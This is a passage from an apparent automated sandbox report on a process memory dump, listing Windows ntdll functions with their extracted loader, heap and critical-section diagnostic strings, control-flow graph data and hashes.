                    • read from, xrefs: 21428F5D, 21428F62
                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 21428E4B
                    • *** An Access Violation occurred in %ws:%s, xrefs: 21428F3F
                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 21428F34
                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 21428DC4
                    • *** Inpage error in %ws:%s, xrefs: 21428EC8
                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 21428DD3
                    • *** enter .exr %p for the exception record, xrefs: 21428FA1
                    • The instruction at %p tried to %s , xrefs: 21428F66
                    • Go determine why that thread has not released the critical section., xrefs: 21428E75
                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 21428DA3
                    • *** enter .cxr %p for the context, xrefs: 21428FBD
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                    • API String ID: 0-108210295
                    • Opcode ID: fa08c8bd6638f305c1c1090976a0037d2bb3023825a69add4ea8159ad80872a6
                    • Instruction ID: 782e99a5c1fadcaf6b166e9d27e0b20a67a82c82e0b5bf043b2a33fc710fd8cb
                    • Opcode Fuzzy Hash: fa08c8bd6638f305c1c1090976a0037d2bb3023825a69add4ea8159ad80872a6
                    • Instruction Fuzzy Hash: 2281D27E900555BFDB218F158C84D6F3BBFAF66768F010068F60CAF31AE2358892D665
                    Function 213F2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                    • API String ID: 0-2160512332
                    • Opcode ID: 3cc322a2ae5f16bce33ac2484468c1d511417a174e5689f6527e09613f475182
                    • Instruction ID: 4cb6c7cacdfbfe24953a136c30a263894ab292ab6fe144102af8b739c9a9cfce
                    • Opcode Fuzzy Hash: 3cc322a2ae5f16bce33ac2484468c1d511417a174e5689f6527e09613f475182
                    • Instruction Fuzzy Hash: 91929A71608742EFE721CF24C880F5BBBEABB85758F00492DFA9497291D774E944CB92
                    Function 213A8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 945 213a8620-213a8681 946 213e5297-213e529d 945->946 947 213a8687-213a8698 945->947 946->947 948 213e52a3-213e52b0 GetPEB 946->948 948->947 949 213e52b6-213e52b9 948->949 950 213e52bb-213e52c5 949->950 951 213e52d6-213e52fc call 213b2ce0 949->951 950->947 953 213e52cb-213e52d4 950->953 951->947 956 213e5302-213e5306 951->956 954 213e532d-213e5341 call 213754a0 953->954 961 213e5347-213e5353 954->961 956->947 958 213e530c-213e5321 call 213b2ce0 956->958 958->947 965 213e5327 958->965 963 213e555c-213e5568 call 213e556d 961->963 964 213e5359-213e536d 961->964 963->947 967 213e536f 964->967 968 213e538b-213e5401 964->968 965->954 971 213e5371-213e5378 967->971 972 213e543a-213e543d 968->972 973 213e5403-213e5435 call 2136fd50 968->973 971->968 974 213e537a-213e537c 971->974 978 213e5514-213e5517 972->978 979 213e5443-213e5494 972->979 985 213e554d-213e5552 call 213fa4b0 973->985 975 213e537e-213e5381 974->975 976 213e5383-213e5385 974->976 975->971 976->968 980 213e5555-213e5557 976->980 978->980 981 213e5519-213e5548 call 2136fd50 978->981 986 213e54ce-213e5512 call 2136fd50 * 2 979->986 987 213e5496-213e54cc call 2136fd50 979->987 980->961 981->985 985->980 986->985 987->985
                    Strings
                    • double initialized or corrupted critical section, xrefs: 213E5508
                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 213E54CE
                    • Thread is in a state in which it cannot own a critical section, xrefs: 213E5543
                    • Invalid debug info address of this critical section, xrefs: 213E54B6
                    • undeleted critical section in freed memory, xrefs: 213E542B
                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 213E54E2
                    • corrupted critical section, xrefs: 213E54C2
                    • Critical section debug info address, xrefs: 213E541F, 213E552E
                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 213E540A, 213E5496, 213E5519
                    • Thread identifier, xrefs: 213E553A
                    • Address of the debug info found in the active list., xrefs: 213E54AE, 213E54FA
                    • Critical section address, xrefs: 213E5425, 213E54BC, 213E5534
                    • 8, xrefs: 213E52E3
                    • Critical section address., xrefs: 213E5502
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                    • API String ID: 0-2368682639
                    • Opcode ID: 44ac248c246fe854d2f7f2c8f4dd72785e22361d9f8b148366364d6c558bcc9f
                    • Instruction ID: 15fce0294887ff6c8b0ee9765c818ecb9902d4643d9482f729077fa833a9542e
                    • Opcode Fuzzy Hash: 44ac248c246fe854d2f7f2c8f4dd72785e22361d9f8b148366364d6c558bcc9f
                    • Instruction Fuzzy Hash: A4817CB5901358EFEB50CF96C884FAEBBBAFF09718F104169E509B7291D335A941CB90
                    Function 213A29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1373 213a29f9-213a2a73 1374 213a2a79-213a2a7b 1373->1374 1375 213e261b-213e2634 call 213ff290 1373->1375 1377 213e2618 1374->1377 1378 213a2a81-213a2a84 1374->1378 1384 213e263e-213e2649 call 2136bae0 1375->1384 1377->1375 1378->1377 1380 213a2a8a-213a2a8d 1378->1380 1380->1377 1381 213a2a93-213a2a99 1380->1381 1382 213a2a9f-213a2ac0 1381->1382 1383 213a2cc7-213a2cd7 call 213b4c30 1381->1383 1386 213e22e2-213e22f5 call 213ff290 1382->1386 1387 213a2ac6-213a2aca 1382->1387 1400 213e264e-213e2659 call 213b2b60 1384->1400 1390 213e22ff-213e2310 1386->1390 1387->1390 1391 213a2ad0-213a2b4b call 213a2cf0 1387->1391 1396 213e231c-213e2328 call 213ba9f0 1390->1396 1397 213e2312-213e2317 1390->1397 1401 213a2b51-213a2b58 1391->1401 1402 213e23c3 1391->1402 1408 213e232a 1396->1408 1409 213e2334-213e2353 1396->1409 1397->1383 1416 213e265e-213e266f GetPEB call 21383ca0 1400->1416 1406 213e23cd-213e23ff call 213a2f98 1401->1406 1407 213a2b5e-213a2b81 1401->1407 1402->1406 1421 213e2428-213e2443 call 213a2e9c 1406->1421 1422 213e2401-213e240e 1406->1422 1412 213a2c3b 1407->1412 1413 213a2b87-213a2bcd call 213a2cf0 1407->1413 1408->1409 1410 213e2384 1409->1410 1411 213e2355-213e236a call 21385e40 1409->1411 1418 213e238a-213e23bb call 213b89a0 1410->1418 1430 213e236c 1411->1430 1431 213e2376-213e2382 1411->1431 1417 213a2c3d 1412->1417 1438 213e24ae-213e24b3 1413->1438 1439 213a2bd3-213a2be1 1413->1439 1416->1383 1425 213e24b8-213e24d1 call 213ff290 1417->1425 1426 213a2c43-213a2c4a 1417->1426 1418->1402 1450 213e2445 1421->1450 1451 213e2410-213e2412 1421->1451 1429 213e2417-213e2420 call 213ff290 1422->1429 1433 213e24db-213e24fb call 21391cf0 1425->1433 1426->1433 1434 213a2c50-213a2c6e call 213a2e9c 1426->1434 1429->1421 1430->1431 1431->1418 1463 213e24fd-213e251c call 213ff290 1433->1463 1464 213e2521-213e2536 1433->1464 1458 213a2c74 1434->1458 1459 213e2601-213e2610 call 213ff290 1434->1459 1443 213a2c7f-213a2c9a call 213a2cf0 1438->1443 1445 213e244c-213e244f 1439->1445 1446 213a2be7-213a2bea 1439->1446 1460 213a2c9f-213a2ca6 1443->1460 1445->1425 1453 213e2451-213e2454 1445->1453 1454 213a2cda-213a2cdd 1446->1454 1455 213a2bf0-213a2bf7 1446->1455 1450->1445 1451->1429 1461 213e245f-213e246a call 213b2b60 1453->1461 1454->1417 1457 213a2ce3-213a2ce9 1454->1457 1455->1461 1462 213a2bfd-213a2c2f call 213a2f98 1455->1462 1457->1413 1469 213a2c76-213a2c7d 1458->1469 1459->1377 1460->1384 1470 213a2cac-213a2cb3 1460->1470 1479 213e2476-213e247c 1461->1479 1462->1479 1480 213a2c35 1462->1480 1463->1469 1467 213e2538-213e2550 1464->1467 1468 213e2552 1464->1468 1477 213e2554-213e25b5 call 213b2dc0 1467->1477 1468->1477 1469->1443 1469->1460 1470->1400 1478 213a2cb9-213a2cc1 1470->1478 1486 213e25d9-213e25db 1477->1486 1487 213e25b7-213e25be 1477->1487 1478->1383 1478->1416 1482 213e247e-213e2484 1479->1482 1483 213e2489-213e24a9 call 213ff290 1479->1483 1480->1412 1482->1454 1483->1443 1486->1434 1490 213e25e1-213e25fc call 213ff290 1486->1490 1487->1486 1489 213e25c0-213e25d4 call 213b2b60 GetPEB call 21383ca0 1487->1489 1489->1486 1490->1469
                    Strings
                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 213E2498
                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 213E2409
                    • @, xrefs: 213E259B
                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 213E24C0
                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 213E2412
                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 213E261F
                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 213E2506
                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 213E25EB
                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 213E2624
                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 213E2602
                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 213E22E4
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                    • API String ID: 0-4009184096
                    • Opcode ID: e2e1fdcc3c72f53073068432bae159d54bc100591a0f9e373ef96e434d9f081e
                    • Instruction ID: b4b08e287a96c93176692ee17a07ef7722ca6fb7a1495ffa89e188fc3ed45fec
                    • Opcode Fuzzy Hash: e2e1fdcc3c72f53073068432bae159d54bc100591a0f9e373ef96e434d9f081e
                    • Instruction Fuzzy Hash: DD025DB1D002299FDB21CB54CC84B9AB7BABF55318F5041DAEA0DA7241EB309F84CF59
                    Function 21418B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                    • API String ID: 0-2515994595
                    • Opcode ID: c5d14fc36d58c8009d482e2a2724275942c15dd607512adfb1e308109d6b1152
                    • Instruction ID: 2f4ecd56756fc1c86109c3130171669209bf3b13223554294cef1d0affcd2bc1
                    • Opcode Fuzzy Hash: c5d14fc36d58c8009d482e2a2724275942c15dd607512adfb1e308109d6b1152
                    • Instruction Fuzzy Hash: 0C51CDB15053469BD325CF188880BABBBEDEF95354F504A2DE99CC3249F770D609CB92
                    Function 2138AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                    • API String ID: 0-3197712848
                    • Opcode ID: 4faa42241a8e2f8262c70f517f526d49c633c0e6039630a155f59b09337f8a8c
                    • Instruction ID: d36b58099397d9faea951c7cc82f2f472ef0cb973c89439192a9b39c295619e5
                    • Opcode Fuzzy Hash: 4faa42241a8e2f8262c70f517f526d49c633c0e6039630a155f59b09337f8a8c
                    • Instruction Fuzzy Hash: 4B1209B26093469FD321CF18C840BAAB7E6FF8570CF05096DF9899B291E734D945CB92
                    Function 2137ADE0 Relevance: 10.6, Strings: 8, Instructions: 573COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$\U4!$\U4!
                    • API String ID: 0-1197931908
                    • Opcode ID: 2c1bc8b75cad7a1c2494f6d54bf479a6120371e4e83943972db369325f263ce8
                    • Instruction ID: 7066968fdab1edcd80753aaeae985d062af64c101a880f2bd68ea7f824d82c85
                    • Opcode Fuzzy Hash: 2c1bc8b75cad7a1c2494f6d54bf479a6120371e4e83943972db369325f263ce8
                    • Instruction Fuzzy Hash: 5432827290426DCBEB22CB14CC94BDEB7BAAF45348F1441E9D849A7255D7399F82CF40
                    Function 21420274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                    • API String ID: 0-1700792311
                    • Opcode ID: 3b21c489aacf288a09858b0cec63c76cba0cf8a9e0d3afb3663c4aba8926abd3
                    • Instruction ID: f010fd213b2b560390fe9fa46881d80455b3643b68d5b3a0698f23cb398ed6f5
                    • Opcode Fuzzy Hash: 3b21c489aacf288a09858b0cec63c76cba0cf8a9e0d3afb3663c4aba8926abd3
                    • Instruction Fuzzy Hash: 0CD1C031900A85DFDB12CF68C444AAEBBF6FF5A718F048059E44D9B76AC739A981CB14
                    Function 2137EA80 Relevance: 9.8, Strings: 7, Instructions: 1073COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T$`V4!${
                    • API String ID: 0-1611330655
                    • Opcode ID: 79ed9cdbdf165091aaf3c6a7502fb70df24c9d66f74ee0ccf0701d4ebd9c4df7
                    • Instruction ID: 176d4bd3ac551178406314e7bf212f8ea6136765d91e99c76eae75b2eb4032c8
                    • Opcode Fuzzy Hash: 79ed9cdbdf165091aaf3c6a7502fb70df24c9d66f74ee0ccf0701d4ebd9c4df7
                    • Instruction Fuzzy Hash: E2A24D76A05629CFDB68CF18C898B99BBBABF45318F1042E9D51DA7650DB349EC1CF00
                    Function 213F89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                    Download Yara Rule
                    Strings
                    • VerifierFlags, xrefs: 213F8C50
                    • VerifierDebug, xrefs: 213F8CA5
                    • HandleTraces, xrefs: 213F8C8F
                    • AVRF: -*- final list of providers -*- , xrefs: 213F8B8F
                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 213F8A67
                    • VerifierDlls, xrefs: 213F8CBD
                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 213F8A3D
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                    • API String ID: 0-3223716464
                    • Opcode ID: 00d80a2bf4c24cd139ec95bfa77a0219e3dc4b24a9067b99298004efb6c89438
                    • Instruction ID: 38d53f037220cad865fbf67b3c2fda937aec53ca614857fe1c50e9d0dc4dc090
                    • Opcode Fuzzy Hash: 00d80a2bf4c24cd139ec95bfa77a0219e3dc4b24a9067b99298004efb6c89438
                    • Instruction Fuzzy Hash: 38911572545786AFD719CF28C880F4A7BEAEF5579CF1104A8FA48AF260D7349C04CB95
                    Function 213A63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                    • API String ID: 0-792281065
                    • Opcode ID: 548461071201f3d14be2767fa1caf03a333d9e99594cfb1a037a87620a86eaff
                    • Instruction ID: 9f2d4b221e48aeaad5fc80390dd9e69a486925533af1145b02976b69b412b54b
                    • Opcode Fuzzy Hash: 548461071201f3d14be2767fa1caf03a333d9e99594cfb1a037a87620a86eaff
                    • Instruction Fuzzy Hash: BF91F3B0A003A5DFEB15CF54C888B9A7BA7EF59B6CF104129E518BB391DB789801C7D1
                    Function 213A2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                    Download Yara Rule
                    Strings
                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 213E219F
                    • SXS: %s() passed the empty activation context, xrefs: 213E2165
                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 213E2178
                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 213E2180
                    • RtlGetAssemblyStorageRoot, xrefs: 213E2160, 213E219A, 213E21BA
                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 213E21BF
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                    • API String ID: 0-861424205
                    • Opcode ID: f9749818f1d48bf2246cc57c5e559549bf90261d3b1e9b9d0e723fba48ae58ba
                    • Instruction ID: 588ba1a43d4980c938188ef09430865ae4d9263fc070e0bc4e6dc43bc0d29eff
                    • Opcode Fuzzy Hash: f9749818f1d48bf2246cc57c5e559549bf90261d3b1e9b9d0e723fba48ae58ba
                    • Instruction Fuzzy Hash: A631B43AA00225BAE7218E958C85F5A7F7FFF55A58F114059FA08A7245D230DB0087A1
                    Function 213AC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                    Download Yara Rule
                    Strings
                    • minkernel\ntdll\ldrredirect.c, xrefs: 213E8181, 213E81F5
                    • minkernel\ntdll\ldrinit.c, xrefs: 213AC6C3
                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 213E81E5
                    • LdrpInitializeImportRedirection, xrefs: 213E8177, 213E81EB
                    • Loading import redirection DLL: '%wZ', xrefs: 213E8170
                    • LdrpInitializeProcess, xrefs: 213AC6C4
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                    • API String ID: 0-475462383
                    • Opcode ID: 513d7ccc4076f1794837c02b67939466050a254305c31ccbc0d3a69a74850d24
